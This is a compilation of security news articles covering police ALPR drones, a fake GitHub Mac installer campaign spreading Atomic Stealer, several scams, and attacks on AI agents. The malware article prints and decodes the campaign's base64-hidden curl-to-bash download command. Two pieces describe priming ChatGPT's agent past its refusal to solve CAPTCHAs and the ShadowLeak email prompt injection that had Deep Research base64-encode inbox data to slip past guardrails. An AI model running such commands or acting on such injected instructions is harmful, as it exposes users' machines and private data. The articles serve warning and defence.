IT News

Police are using drones as flying automated license plate readers (ALPRs), according to a report by the Electronic Frontier Foundation (EFF).

And where there is a market, a provider will jump in. Or was it the other way around this time? Flock Safety, for example, recently told a group of potential law enforcement customers interested in Drone as First Responder (DFR) programs that its drone can be used as a flying license plate reader camera as well.

An ALPR system is an intelligent surveillance system that automatically identifies and documents license plates of vehicles by using optical character recognition. This is not necessary for the drones’ main task—it’s an extra feature.

We can definitely see the benefits of the DFR program, which tell police officers what to expect before they arrive at the scene. Increasing situational awareness by using drones makes it safer for both law enforcement officers and the public.

The problem is that drones equipped with ALPR technology can systematically record vehicle location and movement, indifferent to whether it’s in public or private spaces. Unlike fixed cameras, drones can reach places and angles otherwise inaccessible, so they can look in backyards, private driveways, and even through windows.

Depending on the local circumstances, police DFR programs involve a fleet of drones, which can range in number from a few to a few hundred. Low operational costs enable police and their drones to collect and store enormous amounts of data. These practices increase the risk of breaches or leaks. Agencies often keep ALPR and drone-captured data well beyond its useful period, store it on centralized or external servers, and regularly share it with other agencies or federal authorities, according to the EFF.

According to EFF’s Atlas of Surveillance there are approximately 1,500 police departments known to have a drone program. A recent Wired investigation raised concerns about one police department’s program, finding that roughly one in 10 drone flights lacked a stated purpose and for hundreds of deployment the reason was listed as “unknown.”

There is a thin line between unwarranted surveillance and accidental recordings. The EFF states:

“While some states do require a warrant to use a drone to violate the privacy of a person’s airspace, Alaska, California, Hawaii, and Vermont are currently the only states where courts have held that warrantless aerial surveillance violates residents’ constitutional protections against unreasonable search and seizure absent specific exceptions.”

Combined with Artificial Intelligence (AI)—and these are already operational—drones can become a force to be reckoned with. But we need to start thinking about regulations to limit the privacy implications, so we don’t end up in a surveillance-state society.

Flock has previously described its desire to connect ALPR scans to additional information on the person who owns the car, meaning that we don’t live far from a time when police may see your vehicle drive by and quickly learn that it’s your car and a host of other details about you.

We don’t just report on privacy—we offer you the option to use it.

Privacy risks should never spread beyond a headline. Keep your online privacy yours by using Malwarebytes Privacy VPN.

Running a small business today can hardly be done from a single device, a single location, or a single network.

Staying cybersecure is quite the same.

To extend the security and privacy of small business owners, no matter where you are, Malwarebytes for Teams now includes personal VPN access, for no additional cost, for all registered devices. Whether you’re typing up a draft on your tablet at a café, answering urgent emails from your smartphone at the airport, or just protecting your browsing activity on your laptop, connecting to a personal VPN provides that extra comfort that what you’re doing online is your business and your business only.

With a personal VPN you can:

• Guard your online activity from prying eyes, whether on your laptop, smartphone, or tablet.
• Access information, content, and resources that are typically restricted by location.
• Maintain high speed connections for everything you do.

VPNs (Virtual Private Networks) have a bit of a dual reputation right now: They’re either IT tools that help multinational enterprises connect to corporate networks, or they’re covert programs that help paranoid privacy hawks slip by undetected online. The truth is that VPNs are for everyone, and that’s because what they offer is a benefit to all.

VPNs encrypt and protect your online traffic so that eavesdroppers can’t spy on your browsing behavior. This is useful both at public locations and in your office or home, because not all cyber snoops are hackers or criminals. In fact, some of the most active eavesdroppers are Internet Service Providers themselves, that sell consumer data for profit.

VPNs also provide a simple way to connect to an increasingly segmented internet. Despite the name, “the world wide web” can appear quite different when you travel to another country. The streaming platforms you enjoy at home can be blocked, their digital libraries can differ, and entirely benign resources can be gated behind separate laws. By connecting to any variety of servers through a VPN, you can access the internet you know and rely on, no matter your physical location.

It’s important to remember, however, that a VPN is just one part of a larger cybersecurity strategy. You still need to protect your small business’s devices from malware infections, rogue viruses, shady websites, and online scams.

For those threats, Malwarebytes for Teams also keeps you safe, especially when you’re mobile.  

Malwarebytes Browser Guard is a free browser add-on that stops invasive ad trackers and flags dangerous websites connected to cybercriminal networks that are cleverly disguised to steal your information or infect your device. And for every other type of concerning message, email, link, or QR code, Malwarebytes Scam Guard for iOS and Android provides 24/7, AI-powered evaluations on who to trust, where to click, and what to ignore.

As every small business is unique, every security plan must adapt. Malwarebytes for Teams is proud to offer the security and privacy options that keep a modern mobile business safe online from hackers, scammers, and digital snoops.

Fake versions of legitimate software are currently circulating on GitHub pages, in a large-scale campaign targeting Mac users.

Unfortunately, Malwarebytes for Mac is one of them.

Impersonating brands is sadly commonplace, as scammers take advantage of established brand names to target their victims. So this is nothing new, but we always want to warn you about it when we see it happening.

In this case, the cybercriminals’ goal is to distribute information stealers. They figured out a while ago that the easiest way to infect Macs is to get users to install the malware themselves, and the Atomic Stealer (aka AMOS) is the go-to information stealer for Macs.

The LastPass Threat Intelligence team has posted information about the campaign, which follows a similar pattern for all the impersonated software. Sometimes, the starting point is a sponsored Google ad (did we mention we don’t like them? Oh yes, we did!) that points to GitHub instead of the official page of the developer.

But in other, less obvious cases, you may see search results like these:

These only came up at the top of the search results when I explicitly searched for “Malwarebytes Github MacOS”, but the cybercriminals are known to have used Search Engine Optimization (SEO) techniques to get their listings higher in the search results.

The idea is to get the aspiring user to click on the “GET MALWAREBYTES” button on the dedicated GitHub page.

If someone does click that button, they will end up on a download page with instructions on how to install the fake product, which is actually an information stealer.

The terminal installation instructions for Malwarebytes for Mac pointed to a recently registered domain, but thankfully our Browser Guard blocked it anyway.

Here’s a technical breakdown of the instructions provided to the visitor:

• /bin/bash -c "<something>" runs a command using the Bash shell on macOS or Linux. Bash is the interpreter for shell commands.
• The part in quotes uses $( ... ). Everything inside this gets executed first; its output becomes part of the outer command.
• $(echo aHR0cHM6Ly9nb3NyZWVzdHIuY29tL2h1bi9pbnN0YWxsLnNo | base64 -d) echo ... | base64 -d decodes the long string.
• curl -fsSL is a command to download data from the web. The options mean:
  • -f: Fail silently for HTTP errors.-s: Silent mode (no progress bar).-S: Show errors if -s is used.
  • -L: Follow redirects.

So, putting all this together:

The inner command turns into: curl -fsSL https://gosreestr[.]com/hun/install.sh

The outer command becomes: /bin/bash -c "$(curl -fsSL https://gosreestr[.]com/hun/install.sh)"

So, the complete command tells the system to download a script directly from an external server and immediately execute it using Bash.

This is dangerous for the user on many levels. Because there is no prompt or review, the user does not get a chance to see or assess what the downloaded script will do before it runs. It bypasses security because of the use of the command line, it can bypass normal file download protections and execute anything the attacker wants.

The files to download have already been taken down, but users that recognize this chain of infection are under advice to thoroughly check their machines for an infection.

Impersonated software besides Malwarebytes and LastPass included:

• 1Password
• ActiveCampaign
• After Effects
• Audacity
• Auphonic
• Basecamp
• BetterSnapTool
• Biteable
• Bitpanda
• Bitsgap
• Blog2Social
• Blue Wallet
• Bonkbot
• Carbon Copy Cloner
• Charles Schwab
• Citibank
• CMC Markets
• Confluence
• Coolors
• DaVinci Resolve
• DefiLlama
• Desktop Clockology
• Desygner
• Docker
• Dropbox
• E-TRADE
• EigenLayer
• Fidelity
• Fliki
• Freqtrade Bot
• Freshworks
• Gemini
• GMGN AI
• Gunbot
• Hemingway Editor
• HeyGen
• Hootsuite
• HTX
• Hypertracker
• IRS
• KeyBank
• Lightstream
• Loopback
• Maestro Bot
• Melon
• Metatrader 5
• Metricool
• Mixpanel
• Mp3tag
• Mural
• NFT Creator
• NotchNook
• Notion
• Obsidian
• Onlypult
• Pendle Finance
• Pepperstone
• Pipedrive
• Plus500
• Privnote
• ProWritingAid
• Publer
• Raycast
• Reaper
• RecurPost
• Renderforest
• Rippling
• Riverside.fm
• Robinhood
• Rug AI
• Sage Intacct
• Salesloft
• SentinelOne
• Shippo
• Shopify
• SocialPilot
• Soundtrap
• StreamYard
• SurferSEO
• Thunderbird
• TweetDeck
• Uphold
• Veeva CRM
• Viraltag
• VSCO
• Vyond
• Webull
• Xai Games
• XSplit
• Zealy
• Zencastr
• Zenefits
• Zotero

But it’s highly likely that there will be more, so don’t see this as an exhaustive list.

How to stay safe

Both ThreatDown and Malwarebytes for Mac detect and block this Atomic Stealer variant and many others, but it’s better to not download it at all. There are a few golden guidelines on how to stay safe:

• Never run copy-pasted commands from random pages or forums even if they are on seemingly legitimate GitHub pages, and especially don’t use any that involve curl … | bash or similar combos.
• Always download software from the official developer pages. If they do not host it themselves, verify the download links with them.
• Avoid sponsored search results. At best they cost the company you looked for money and at worst you fall prey to imposters.
• Use real-time anti-malware protection, preferably one that includes a web protection component.

If you have scanned your Mac and found the information stealer:

• Remove any suspicious login items, LaunchAgents, or LaunchDaemons from the Library folders to ensure the malware does not persist after reboot.
• If any signs of persistent backdoor or unusual activity remain, strongly consider a full clean reinstall of macOS to ensure all malware components are eradicated. Only restore files from known clean backups. Do not reuse backups or Time Machine images that may be tainted by the infostealer.
• After reinstalling, check for additional rogue extensions, crypto wallet apps, and system modifications.
• Change all the passwords that were stored on the affected system and enable multi-factor authentication for your important accounts.
• If all this sounds too difficult for you to do yourself, ask someone or a company you trust to help you—our support team are happy to assist you if you have any concerns.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

This week on the Lock and Code podcast

There’s more about you online than you know.

The company Acxiom, for example, has probably determined whether you’re a heavy drinker, or if you’re overweight, or if you smoke (or all three). The same company has also probably estimated—to the exact dollar—the amount you spend every year on dining out, donating to charities, and traveling domestically. Another company Experian, has probably made a series of decisions about whether you are “Likely,” “Unlikely,” “Highly Likely,” etc., to shop at a mattress store, visit a theme park, or frequent the gym.

This isn’t the data most people think about when considering their online privacy. Yes, names, addresses, phone numbers, and age are all important and potentially sensitive, and yes, there’s a universe of social media posts, photos, videos, and comments that are likely at the harvesting whim of major platforms to collect, package, and sell access to for targeted advertising.

But so much of the data that you leave behind online has nothing to do with what you willingly write, post, share, or say. Instead, it is data that is collected from online and offline interactions, like the items you add in a webpage’s shopping cart, the articles you read, the searches you make, and the objects you buy at a physical store.

Importantly, it is also data that is very hard to get rid of.

Today, on the Lock and Code podcast with host David Ruiz, we speak with Peter Dolanjski, director of product at DuckDuckGo, about why the internet is so hungry for your data, how parents can help protect the privacy of their children, and whether it is pointless to try to “disappear” online.

“It’s not futile…  Taking steps now, despite the fact that you already have information out there, will help you into the future.”

Tune in today to listen to the full conversation.

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)

Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.

Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium Security for Lock and Code listeners.

A security flaw in the American Archive of Public Broadcasting (AAPB) website allowed unauthorized access to protected and private media, according to BleepingComputer.

The American Archive of Public Broadcasting (AAPB) is a collaborative initiative between the Library of Congress and WGBH Educational Foundation, aimed at digitally preserving historically significant public radio and television programs from the past seven decades.

The archives encompass a wide array of materials: news and public affairs programs, local history productions, educational content, science, music, art, literature, environmental programming, and raw interviews from landmark documentaries. The digitized content contains millions of items, including unique, sometimes sensitive material documenting pivotal events, regional culture, and documentary evidence of America’s civil and artistic history.

Access without proper controls could facilitate copyright violations or the misuse of material critical for scholarship, public education, and future generations. And that’s what the discovered vulnerability provided.

Not only did this vulnerability go unnoticed for years, the researcher who discovered the hole found that active exploitation started as early as at least 2021, even after a previous report by the same researcher to AAPB. But when BleepingComputer reached out, AAPB managed to implement a fix within 48 hours. And the researcher was able to confirm it worked.

AAPB’s Communications Manager, Emily Balk told BleepingComputer:

“We’re committed to protecting and preserving the archival material in the AAPB and have strengthened security for the archive.”

On Discord the exploit method began circulating halfway through 2024, but even before that exploit, a simple script allowed users to request media files by ID and bypass AAPB’s access controls. This method worked even if the requested media files fell into protected or private categories. As long as the request had a valid media ID, it was possible to download the content.

Apparently there are data-hoarder communities that do not care about copyright, which abused and shared the method for many years. The main impact was the unauthorized access and sharing of archival media, some of which was not intended for public release. This is an institutional and copyright issue.

However, users should:

• Avoid sharing or downloading protected or leaked content, as you could be in a legal gray area.
• Be wary of unofficial sources circulating rare or unpublished public broadcasting material.
• Anticipate there might be phishing emails coming based on this breach. As with other news events, phishers will use them as clickbait.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Been scammed? Hoping to report it to the FBI? Definitely do so, but be careful. Spoofed versions of the FBI’s Internet Crime Complaint Center (IC3) website are now circulating online, and they lead straight back to the scammers.

The FBI issued an advisory last week, warning that cybercriminals are setting up fake versions of their site to tempt people into entering their personal information:

“Members of the public could unknowingly visit spoofed websites while attempting to find FBI IC3’s website to submit an IC3 report.”

Criminals spoof legitimate sites like the IC3 portal using techniques including ‘typosquatting’. They’ll create web domains that look like the target, but have subtle differences in the URL. They’ll often misspell or add characters to a domain name, which can deceive users attempting to report cybercrime incidents.

The IC3 is the primary hub for cybercrime reporting in the US, and its services are now in high demand. According to the 2024 IC3 Crime Report, victims filed 859,532 complaints with it last year, totalling $16.6 billion in losses (up a third from 2023).

Criminals recognize that victims seeking help are often vulnerable to secondary attacks. After all, they already got caught out once, and are likely already at an emotional disadvantage. So they often succeed in attracting those victims to fake portals like these, with a view to scamming them again. A distracted or distraught victim can often hand over their sensitive data for a second time, including names, addresses, phone numbers, email addresses, and banking information.

This threat follows a disturbing pattern of law enforcement impersonation lately. In April this year, the FBI reported that criminals were targeting victims via social media, emails, and phone calls. In some cases, scammers would use fake social media accounts to approach members of fraud victim groups, convincing them that their funds had been recovered.

Attackers often impersonate law enforcement directly. In March, the FBI Philadelphia Field Office reported that scammers were routinely spoofing authentic law enforcement and government agency phone numbers to extort money from victims. A 2023 NPR investigation revealed how criminals leverage caller ID spoofing and voice cloning technology to impersonate real US Marshals.

As far back as 2022, the FBI reported that people were impersonating its officials. In one particularly nasty scenario, people were being duped by romance scammers, and when they became wise to the trick and cut communications, the organization behind the scam would contact them pretending to be a government official asking for help to catch romance scammers. Or they would tell the victim that they need to clear their name, which has been linked to a crime.

If you do fall victim to this kind of fraud, it’s far from certain that you’ll get your money back. The IC3’s 2024 report documents the Recovery Asset Team’s efforts to combat fraud through the Financial Fraud Kill Chain, which achieved a 66% success rate freezing cash from fraudulent transactions. According to that report, the average victim to online crime lost almost $20,000.

How to protect yourself

The main thing to remember is that IC3 employees will never contact you directly via phone, email, or social media, and will never request payment for fund recovery. If someone recommends that you visit a site for fund recovery, take that recommendation with several swimming pools-worth of salt.

If you suspect you’ve already been scammed, then quick reporting is key. Stop talking to the scammers immediately and get in touch with the IC3 now. Do that by typing the www.ic3.gov web address directly into your browser rather than relying on someone else’s link or a search result.

All online crime is nasty, but this portal scam is particularly horrid, because it often targets people who have already been hit once. As always, check in with your less-tech-savvy friends and relatives to ensure they haven’t fallen victim to something like this, especially if they’re older. One infuriating stat from the IC3 report is that the older the victim, the greater the loss.

We don’t just report on scams—we help detect them

Cybersecurity risks should never spread beyond a headline. If something looks dodgy to you, check if it’s a scam using Malwarebytes Scam Guard, a feature of our mobile protection products. Submit a screenshot, paste suspicious content, or share a text or phone number, and we’ll tell you if it’s a scam or legit. Download Malwarebytes Mobile Security for iOS or Android and try it today!

As we have said many times before, falling for a scam can happen to the best of us. And it can ruin lives. In our podcast How a scam hunter got scammed, scam hunter Julie-Anne Kearns talked about how she had been duped by people pretending to be from HMRC, which is the UK’s version of the US Internal Revenue Service (IRS).

This week in the New York Times crime reporter Michael Wilson, who has covered many scams during his career, almost fell for a scam that used a spoofed telephone number from Chase Bank. Michael’s story sounded vaguely familiar to us because we reported about something similar back in 2022.

The scam is a prime example of how social engineering is used to talk victims out of their money.

Michael received a call, seemingly from a Chase bank branch. The caller even invited him to Google the number and pointed out which branch he was “calling from.” The scammer claimed that fraudulent Zelle transfers had been made to and from a bank account in his name, even though Michael had never opened an account with Chase.

The initial scammer gave Michael a case number and put him through to “his supervisor.” This man asked Michael to open Zelle.

Zelle is a popular US peer-to-peer payment service that allows users to send and receive money quickly and securely directly from their bank accounts using just an email address or mobile phone number.

Where it says, “Enter an amount,” the “supervisor” instructed him to type $2,100, the amount of the withdrawals he said he was going to help reverse. In another field the scammer wanted Michael to enter the 10 digits of the case number. This triggered Michael’s spidey senses—it looked suspiciously like a phone number:

“This case number sure looks like a phone number, and I’m about to send that number $2,100.”

At that point the scammer gave him a 19 character code to put in the “What’s this for?” field, telling Michael it was needed for his team to be able to reverse the transaction.

But that didn’t calm down the spidey senses and Michael asked the question that will scare most scammers away. He proposed to meet in person and settle this. The scammer tried to persuade him by saying it might be too late by then, but Michael persisted and said he’d call back.

Only then did he realize the scammers had him on the hook for 16 minutes before he managed to break free.

“I should be able to spot a scam in under 16 seconds, I thought — but 16 minutes?”

Michael found that several others had been approached in the very same way. The “supervisor” is an element that provides legitimacy to the call and makes people feel like they’re talking to actual bank employees.

And once they have you filling out forms and writing down long codes, they have turned you from a critical thinker into a person with a mission to fulfil.

For completeness’ sake, Michael went to the bank office and asked for the two employees he’d allegedly spoken to. No surprise they didn’t work there, but someone who did work there recognized the scam and said she’d heard the story many times before and actually knew about a few people that lost money to these scammers.

How to avoid Zelle scams

There’s several aspects of this attack common to many others which may indicate a fraud attempt.

• They don’t want you to call the bank back. If you do this, the scam falls apart because their number is spoofed. A genuine member of staff would have no issue with you calling them.
• Pressure tactics. If a bank calls you out of the blue and claims that they’re powerless to stop something without your assistance, be very cautious. Is your bank really unable to perform a basic banking action?
• Knowing your date of birth, address, and other information doesn’t mean the caller is genuine. They may have obtained the data from a phish, or a security breach.
• Referencing third party payment apps may be another red flag, especially if they talk about a platform you’ve not used before.

Zelle transfers are instantaneous and almost impossible to reverse. And neither banks nor Zelle are liable for fraudulent payments, so a refund is highly unlikely. So, be extra careful when using Zelle.

Did you know, you can use Malwarebytes Scam Guard for this kind of situation as well? We tested Scam Guard with some details from the NYT story and it correctly identified it as a known scam, asked some follow up questions, and provided a clear set of recommendations.

We don’t just report on scams—we help detect them

Cybersecurity risks should never spread beyond a headline. If something looks dodgy to you, check if it’s a scam using Malwarebytes Scam Guard, a feature of our mobile protection products. Submit a screenshot, paste suspicious content, or share a text or phone number, and we’ll tell you if it’s a scam or legit. Download Malwarebytes Mobile Security for iOS or Android and try it today!

If you’re seeing fewer or different CAPTCHA puzzles in the near future, that’s not because website owners have agreed that they’re annoying, but it might be because they no longer prove that the visitor is human.

For those that forgot what CAPTCHA stands for: Completely Automated Public Turing test to tell Computers and Humans Apart.

The fact that AI bots can bypass CAPTCHA systems is nothing new. Sophisticated bots have been bypassing CAPTCHA systems for years using methods such as optical character recognition (OCR), machine learning, and AI, making traditional CAPTCHA challenges increasingly ineffective.

Most of the openly accessible AI chat agents have been barred from solving CAPTCHAs by their developers. But now researchers say they’ve found a way to get ChatGPT to solve image-based CAPTCHAs. They did this by prompt injection, similar to “social engineering” a chatbot into doing something it would refuse if you asked it outright.

In this case, the researchers convinced ChatGPT-4o that it was solving fake CAPTCHAs.

According to the researchers:

“This priming step is crucial to the exploit. By having the LLM affirm that the CAPTCHAs were fake and the plan was acceptable, we increased the odds that the agent would comply later.”

This is something I have noticed myself. When I ask an AI to help me analyze malware, it often starts by saying it is not allowed to help me, but once I convince it I’m not going to improve it or make a new version of it, then it’ll often jump right in and assist me in unravelling it. By doing so, it provides information that a cybercriminal could use to make their own version of the malware.

The researchers proceeded by copying the conversation they had with the chatbot into the ChatGPT agent they planned to use.

A chatbot is built to answer questions and follow specific instructions given by a person, meaning it helps with single tasks and relies on constant user input for each step. In contrast, an AI agent acts more like a helper that can understand a big-picture goal (for example, “book me a flight” or “solve this problem”) and can take action on its own, handling multi-step tasks with less guidance needed from the user.

A chatbot relies on the person to provide every answer, click, and decision throughout a CAPTCHA challenge, so it cannot solve CAPTCHAs on its own. In contrast, an AI agent plans tasks, adapts to changes, and acts independently, allowing it to complete the entire CAPTCHA process with minimal user input.

What the researchers found is that the agent had no problems with one-click CAPTCHAs, logic-based CAPTCHAs, and CAPTCHAs based on text-recognition. It had more problems with image-based CAPTCHAs requiring precision (drag-and-drop, rotation, etc.), but managed to solve some of those as well.

Is this a next step in the arms-race, or will the web developers succumb to the fact that AI agents and AI browsers are helping a human to get the information from their website that they need, with or without having to solve a puzzle.

We don’t just report on data privacy—we help you remove your personal information

Cybersecurity risks should never spread beyond a headline. With Malwarebytes Personal Data Remover, you can scan to find out which sites are exposing your personal information, and then delete that sensitive data from the internet.

Last week on Malwarebytes Labs:

• ChatGPT Deep Research zero-click vulnerability fixed by OpenAI
• Disrupted phishing service was after Microsoft 365 credentials
• Update your Chrome today: Google patches 4 vulnerabilities including one zero-day
• Age verification and parental controls coming to ChatGPT to protect teens
• 224 malicious apps removed from the Google Play Store after ad fraud campaign discovered
• Airline data broker selling 5 billion passenger records to US government
• Update your Apple devices to fix dozens of vulnerabilities
• Grok, ChatGPT, other AIs happy to help phish senior citizens
• “A dare, a challenge, a bit of fun:” Children are hacking their own schools’ systems, says study
• Watch out for the “We are hiring” remote online evaluator message scam

Stay safe!

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

OpenAI has moved quickly to patch a vulnerability known as “ShadowLeak” before anyone detected real-world abuse. Revealed by researchers yesterday, ShadowLeak was an issue in OpenAI’s Deep Research project that attackers could exploit by simply sending an email to the target.

Deep Research was launched in ChatGPT in early 2025 to enable users to delegate time-intensive, multi-step research tasks to an autonomous agent operating as an agentic AI (Artificial Intelligence). Agentic AI is a term that refers to AI systems that can act autonomously to achieve objectives by planning, deciding, and executing tasks with minimal human intervention. Deep Research users can primarily be found in finance, science, policy, engineering, and similar fields.

Users are able to select a “deep research” mode, input a query—optionally providing the agent with files and spreadsheets—and receive a detailed report after the agent browses, analyzes, and processes information from dozens of sources.

The researchers found a zero-click vulnerability in the Deep Research agent, that worked when the agent was connected to Gmail and browsing. By sending the target a specially crafted email, the agent leaked sensitive inbox information to the attacker, without the target needing to do anything and without any visible signs.

The attack relies on prompt injection, which is a well-known weak spot for AI agents. The poisoned prompts can be hidden in email by using tricks like tiny fonts, white-on-white text, and layout tricks. The target will not see them, but the agent still reads and obeys them.

And the data leak is impossible to pick up by internal defenses, since the leak occurs server-side, directly from OpenAI’s cloud infrastructure.

The researchers say it wasn’t easy to craft an effective email due to existing protection (guardrails) which recognized straight-out and obvious attempts to send information to an external address. For example, when the researchers tried to get the agent to interact with a malicious URL, it didn’t just refuse. It flagged the URL as suspicious and attempted to search for it online instead of opening it.

The key to success was to get the agent to encode the extracted PII with a simple method (base64) before appending it to the URL.

“This worked because the encoding was performed by the model before the request was passed on to the execution layer. In other words, it was relatively easy to convince the model to perform the encoding, and by the time the lower layer received the request, it only saw a harmless encoded string rather than raw PII.”

In the example, the researchers used Gmail as a connector,  but there are many other sources that present structured text which can be used as a potential prompt injection vector.

Safe use of agentic agents

While it’s always tempting to use the latest technology, this comes with a certain amount of risk. To limit those risks when using agentic agents you should:

• Be cautious with permissions: Only grant access to sensitive information or system controls when absolutely necessary. Review what data or accounts the agentic browser can access and limit permissions where possible.
• Verify sources before trusting links or commands: Avoid letting the browser automatically interact with unfamiliar websites or content. Check URLs carefully and be wary of sudden redirects, additional parameters, or unexpected input requests.
• Keep software updated: Ensure the agentic browser and related AI tools are always running the latest versions to benefit from security patches and improvements against prompt injection exploits.
• Use strong authentication and monitoring: Protect accounts connected to agentic browsers with multi-factor authentication and review activity logs regularly to spot unusual behavior early.
• Educate yourself about prompt injection risks: Stay informed on the latest threats and best practices for safe AI interactions. Being aware is the first step to preventing exploitation.
• Limit sensitive operations automation: Avoid fully automating high-stakes transactions or actions without manual review. Agentic agents should assist, but critical decisions deserve human oversight.
• Report suspicious behavior: If an agentic agent acts unpredictably or asks for strange permissions, report it to the developers or security teams immediately for investigation.

We don’t just report on data privacy—we help you remove your personal information

Cybersecurity risks should never spread beyond a headline. With Malwarebytes Personal Data Remover, you can scan to find out which sites are exposing your personal information, and then delete that sensitive data from the internet.